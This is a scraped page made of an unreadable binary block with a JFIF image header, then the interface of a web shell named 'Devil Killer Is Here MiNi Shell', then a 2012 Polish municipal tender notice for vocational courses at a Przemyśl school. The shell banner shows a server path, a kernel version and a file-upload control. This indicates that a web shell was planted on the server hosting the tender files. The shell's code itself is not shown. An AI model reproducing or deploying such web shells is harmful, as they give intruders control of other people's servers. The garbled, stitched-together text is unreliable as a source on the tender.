JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121116/243127-N-2012.html

<p class="kh_header"><b>Przemyśl: Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie certyfikowanych kursów i szkoleń dla uczniów i uczennic Zespołu Szkół Usługowo-Hotelarskich i Gastronomicznych w Przemyślu w ramach projektu Podkarpacie stawia na zawodowców współfinansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego</b><br>
<b>Numer ogłoszenia: 243127 - 2012; data zamieszczenia: 16.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Przemyśl - Prezydent Miasta Przemyśl , ul. Rynek 1, 37-700 Przemyśl, woj. podkarpackie, tel. 016 6782962, 6752072, faks 016 6786449.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie certyfikowanych kursów i szkoleń dla uczniów i uczennic Zespołu Szkół Usługowo-Hotelarskich i Gastronomicznych w Przemyślu w ramach projektu Podkarpacie stawia na zawodowców współfinansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie certyfikowanych zajęć kursowych dla uczniów i uczennic Zespołu Szkół Usługowo-Hotelarskich i Gastronomicznych w Przemyślu w ramach projektu Podkarpacie stawia na zawodowców współfinansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności 
i jakości szkolnictwa zawodowego.
2. Przedmiot zamówienia został podzielony jest na cztery części, które będą realizowae ww. szkole i obejmują:
1)	kurs carvingu - zadanie częściowe nr 1,
2)	kurs kelner - barman - zadanie częściowe nr 2,
3)	kurs baristy - zadanie częściowe nr 3,
4)	kurs z nowoczesnych technik fryzjerskich - zadanie częściowe nr 4.

3. Realizacja ww. zajęć kursowych odbywać się będzie w siedzibie ZSHiG przy ul. Bakończyckiej 11 w Przemyślu, przez czas trwania umowy, w terminach uzgodnionych 
z dyrekcją szkoły w systemie piątkowo - sobotnio - niedzielnym (dotyczy zadań częściowych nr 1, 2 i 3) i sobotnio - niedzielnym (dotyczy zadania częściowego nr 4), w wymiarze godzin przewidzianych dla każdej grupy uczniów, zgodnie z założeniami projektu, bezpośrednio przed lub po zajęciach określonych planem lekcji i zajęć pozalekcyjnych, w których uczniowie już uczestniczą. Zmiana godzin jest dopuszczalna jedynie za wcześniejszą pisemną zgodą dyrekcji szkoły.
4. Zajęcia prowadzone będą od września 2013 r. do 30 czerwca 2014 r. 
5. Zajęcia kursowe zostaną przeprowadzone zgodnie z programem zajęć przedstawionym 
w załączniku nr 1 do SIWZ.
6. Wykonawca uzgodni z Dyrekcją Szkoły harmonogram planowanych do prowadzenia zajęć kursowych i przedłoży do Zamawiającemu zgodnie z postanowieniami umowy.
7. Wykonawca w toku prowadzonych zajęć będzie w sposób systematyczny prowadził dokumentację związaną z prowadzeniem danej części zajęć tj. listy obecności, dzienniku zajęć, oceny postępu wraz z określeniem uczniów osiągających najwyższe wyniki, na podstawie przeprowadzonych testów, ćwiczeń a także inne dokumenty niezbędne dla potrzeb realizacji projektu (np. kart obserwacji i innej dokumentacji dotyczącej mierzenia wskaźników pomiaru celu projektu zapisanych we wniosku o dofinansowanie).
8. Przygotowania i sporządzenia w formie elektronicznej i papierowej sprawozdania (sprawozdań) danego rodzaju zajęć i działań wynikających z projektu, w którym zawarte będzie okresowe porównanie wyników osiąganych przez uczniów.
9. Wykonawca zobowiązany jest do ścisłej współpracy z Zamawiającym.
10. Po zakończeniu zajęć kursowych Wykonawca wyda stosowne dokumenty świadczące 
o ukończeniu kursu np. zaświadczenie zawierające dane uczestnika kursu, tematykę kursu, liczbę godzin przypadająca na poszczególne tematy w ramach prowadzonych zajęć.
11. Program tematyczny poszczególnych zajęć kursowych oraz wymagania jakie ma spełnić Wykonawca zawarte są  w załącznikach na 1 i 1 A do SIWZ, a pozostałe zobowiązania zawarte są we wzorze umowy.
12. Materiały szkoleniowe, pomoce dydaktyczne dla uczniów umożliwiające przeprowadzenie wymienionych w pkt 1 zajęć kursowych zabezpiecza Wykonawca.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy w tym okresie, zrealizował co najmniej dwa zajęcia kursowe:
1)	kurs carvingu - zadanie częściowe nr 1,
2)	kurs kelner - barman - zadanie częściowe nr 2,
3)	kurs baristy - zadanie częściowe nr 3,
4)	kurs z nowoczesnych technik fryzjerskich - zadanie częściowe nr 4.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca będzie dysponował w trakcie kursu, osobami zdolnymi do wykonania zamówienia posiadającymi wiedzę i doświadczenie wymienione w arkuszu 1 opisu przedmiotu zamówienia stanowiącym załącznik Nr 1 A do SIWZ (warunek dotyczy wszystkich zadań częściowych).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty:
1) wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy Formularz oferty według wzoru stanowiącego załącznik Nr 2 do SIWZ,                                                                    
2) pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę o ile osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jej reprezentacji we właściwym rejestrze.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, z zastrzeżeniem ust. 2. 
2. Dopuszcza się zmianę postanowień zawartej umowy, w stosunku do treści oferty, w następującym zakresie i przy spełnieniu następujących warunków: 
a) zmiana okresu realizacji umowy, o którym mowa w § 2 - 4  umowy, jest możliwa w przypadku zdarzeń losowych powodujących np.: konieczność zamknięcia czy przesunięcie terminów realizacji zajęć kursu;
b) zmiany zakresu realizacji umowy polegającej na przesunięciach godzin zajęć w przypadku istotnej zmiany liczby uczniów uczestniczących w zajęciach. 
3. Zmianę postanowień zawartej umowy dokonuje się za zgodą obu stron umowy. 
4. Wszelkie zmiany niniejszej umowy mogą być dokonane każdorazowo w formie pisemnego aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przemysl.pl BIP usługi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Przemyślu, Wieloosobowe Stanowisko ds. Zamówień Publicznych, ul. Ratuszowa 10 A, 37-700 Przemyśl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2012 godzina 09:00, miejsce: Urząd Miejski w Przemyślu, Wieloosobowe Stanowisko ds. Zamówień Publicznych, ul. Ratuszowa 10 A, 37-700 Przemyśl.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Podkarpacie stawia na zawodowców współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX Rozwój wykształcenia i kompetencji w regionach Działania 9.2 Podniesienie atrakcyjności i jakości szkolnictwa zawodowego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs carvingu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Realizacja ww. zajęć kursowych odbywać się będzie w siedzibie ZSHiG przy ul. Bakończyckiej 11 w Przemyślu, przez czas trwania umowy, w terminach uzgodnionych 
z dyrekcją szkoły w systemie piątkowo - sobotnio - niedzielnym (dotyczy zadań częściowych nr 1, 2 i 3) i sobotnio - niedzielnym (dotyczy zadania częściowego nr 4), w wymiarze godzin przewidzianych dla każdej grupy uczniów, zgodnie z założeniami projektu, bezpośrednio przed lub po zajęciach określonych planem lekcji i zajęć pozalekcyjnych, w których uczniowie już uczestniczą. Zmiana godzin jest dopuszczalna jedynie za wcześniejszą pisemną zgodą dyrekcji szkoły.
2. Zajęcia prowadzone będą od września 2013 r. do 30 czerwca 2014 r. 
3. Zajęcia kursowe zostaną przeprowadzone zgodnie z programem zajęć przedstawionym w załączniku nr 1 do SIWZ.
4. Wykonawca uzgodni z Dyrekcją Szkoły harmonogram planowanych do prowadzenia zajęć kursowych i przedłoży do Zamawiającemu zgodnie z postanowieniami umowy.
5. Wykonawca w toku prowadzonych zajęć będzie w sposób systematyczny prowadził dokumentację związaną z prowadzeniem danej części zajęć tj. listy obecności, dzienniku zajęć, oceny postępu wraz z określeniem uczniów osiągających najwyższe wyniki, na podstawie przeprowadzonych testów, ćwiczeń a także inne dokumenty niezbędne dla potrzeb realizacji projektu (np. kart obserwacji i innej dokumentacji dotyczącej mierzenia wskaźników pomiaru celu projektu zapisanych we wniosku o dofinansowanie).
6. Przygotowania i sporządzenia w formie elektronicznej i papierowej sprawozdania (sprawozdań) danego rodzaju zajęć i działań wynikających z projektu, w którym zawarte będzie okresowe porównanie wyników osiąganych przez uczniów.
7. Wykonawca zobowiązany jest do ścisłej współpracy z Zamawiającym.
8. Po zakończeniu zajęć kursowych Wykonawca wyda stosowne dokumenty świadczące 
o ukończeniu kursu np. zaświadczenie zawierające dane uczestnika kursu, tematykę kursu, liczbę godzin przypadająca na poszczególne tematy w ramach prowadzonych zajęć.
9. Program tematyczny poszczególnych zajęć kursowych oraz wymagania jakie ma spełnić Wykonawca zawarte są  w załącznikach na 1 i 1 A do SIWZ, a pozostałe zobowiązania zawarte są we wzorze umowy.
10. Materiały szkoleniowe, pomoce dydaktyczne dla uczniów umożliwiające przeprowadzenie wymienionych w pkt 1 zajęć kursowych zabezpiecza Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8, 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs kelner - barman.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Realizacja ww. zajęć kursowych odbywać się będzie w siedzibie ZSHiG przy ul. Bakończyckiej 11 w Przemyślu, przez czas trwania umowy, w terminach uzgodnionych 
z dyrekcją szkoły w systemie piątkowo - sobotnio - niedzielnym (dotyczy zadań częściowych nr 1, 2 i 3) i sobotnio - niedzielnym (dotyczy zadania częściowego nr 4), w wymiarze godzin przewidzianych dla każdej grupy uczniów, zgodnie z założeniami projektu, bezpośrednio przed lub po zajęciach określonych planem lekcji i zajęć pozalekcyjnych, w których uczniowie już uczestniczą. Zmiana godzin jest dopuszczalna jedynie za wcześniejszą pisemną zgodą dyrekcji szkoły.
2. Zajęcia prowadzone będą od września 2013 r. do 30 czerwca 2014 r. 
3. Zajęcia kursowe zostaną przeprowadzone zgodnie z programem zajęć przedstawionym w załączniku nr 1 do SIWZ.
4. Wykonawca uzgodni z Dyrekcją Szkoły harmonogram planowanych do prowadzenia zajęć kursowych i przedłoży do Zamawiającemu zgodnie z postanowieniami umowy.
5. Wykonawca w toku prowadzonych zajęć będzie w sposób systematyczny prowadził dokumentację związaną z prowadzeniem danej części zajęć tj. listy obecności, dzienniku zajęć, oceny postępu wraz z określeniem uczniów osiągających najwyższe wyniki, na podstawie przeprowadzonych testów, ćwiczeń a także inne dokumenty niezbędne dla potrzeb realizacji projektu (np. kart obserwacji i innej dokumentacji dotyczącej mierzenia wskaźników pomiaru celu projektu zapisanych we wniosku o dofinansowanie).
6. Przygotowania i sporządzenia w formie elektronicznej i papierowej sprawozdania (sprawozdań) danego rodzaju zajęć i działań wynikających z projektu, w którym zawarte będzie okresowe porównanie wyników osiąganych przez uczniów.
7. Wykonawca zobowiązany jest do ścisłej współpracy z Zamawiającym.
8. Po zakończeniu zajęć kursowych Wykonawca wyda stosowne dokumenty świadczące 
o ukończeniu kursu np. zaświadczenie zawierające dane uczestnika kursu, tematykę kursu, liczbę godzin przypadająca na poszczególne tematy w ramach prowadzonych zajęć.
9. Program tematyczny poszczególnych zajęć kursowych oraz wymagania jakie ma spełnić Wykonawca zawarte są  w załącznikach na 1 i 1 A do SIWZ, a pozostałe zobowiązania zawarte są we wzorze umowy.
10. Materiały szkoleniowe, pomoce dydaktyczne dla uczniów umożliwiające przeprowadzenie wymienionych w pkt 1 zajęć kursowych zabezpiecza Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8, 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs baristy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Realizacja ww. zajęć kursowych odbywać się będzie w siedzibie ZSHiG przy ul. Bakończyckiej 11 w Przemyślu, przez czas trwania umowy, w terminach uzgodnionych 
z dyrekcją szkoły w systemie piątkowo - sobotnio - niedzielnym (dotyczy zadań częściowych nr 1, 2 i 3) i sobotnio - niedzielnym (dotyczy zadania częściowego nr 4), w wymiarze godzin przewidzianych dla każdej grupy uczniów, zgodnie z założeniami projektu, bezpośrednio przed lub po zajęciach określonych planem lekcji i zajęć pozalekcyjnych, w których uczniowie już uczestniczą. Zmiana godzin jest dopuszczalna jedynie za wcześniejszą pisemną zgodą dyrekcji szkoły.
2. Zajęcia prowadzone będą od września 2013 r. do 30 czerwca 2014 r. 
3. Zajęcia kursowe zostaną przeprowadzone zgodnie z programem zajęć przedstawionym w załączniku nr 1 do SIWZ.
4. Wykonawca uzgodni z Dyrekcją Szkoły harmonogram planowanych do prowadzenia zajęć kursowych i przedłoży do Zamawiającemu zgodnie z postanowieniami umowy.
5. Wykonawca w toku prowadzonych zajęć będzie w sposób systematyczny prowadził dokumentację związaną z prowadzeniem danej części zajęć tj. listy obecności, dzienniku zajęć, oceny postępu wraz z określeniem uczniów osiągających najwyższe wyniki, na podstawie przeprowadzonych testów, ćwiczeń a także inne dokumenty niezbędne dla potrzeb realizacji projektu (np. kart obserwacji i innej dokumentacji dotyczącej mierzenia wskaźników pomiaru celu projektu zapisanych we wniosku o dofinansowanie).
6. Przygotowania i sporządzenia w formie elektronicznej i papierowej sprawozdania (sprawozdań) danego rodzaju zajęć i działań wynikających z projektu, w którym zawarte będzie okresowe porównanie wyników osiąganych przez uczniów.
7. Wykonawca zobowiązany jest do ścisłej współpracy z Zamawiającym.
8. Po zakończeniu zajęć kursowych Wykonawca wyda stosowne dokumenty świadczące 
o ukończeniu kursu np. zaświadczenie zawierające dane uczestnika kursu, tematykę kursu, liczbę godzin przypadająca na poszczególne tematy w ramach prowadzonych zajęć.
9. Program tematyczny poszczególnych zajęć kursowych oraz wymagania jakie ma spełnić Wykonawca zawarte są  w załącznikach na 1 i 1 A do SIWZ, a pozostałe zobowiązania zawarte są we wzorze umowy.
10. Materiały szkoleniowe, pomoce dydaktyczne dla uczniów umożliwiające przeprowadzenie wymienionych w pkt 1 zajęć kursowych zabezpiecza Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8, 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
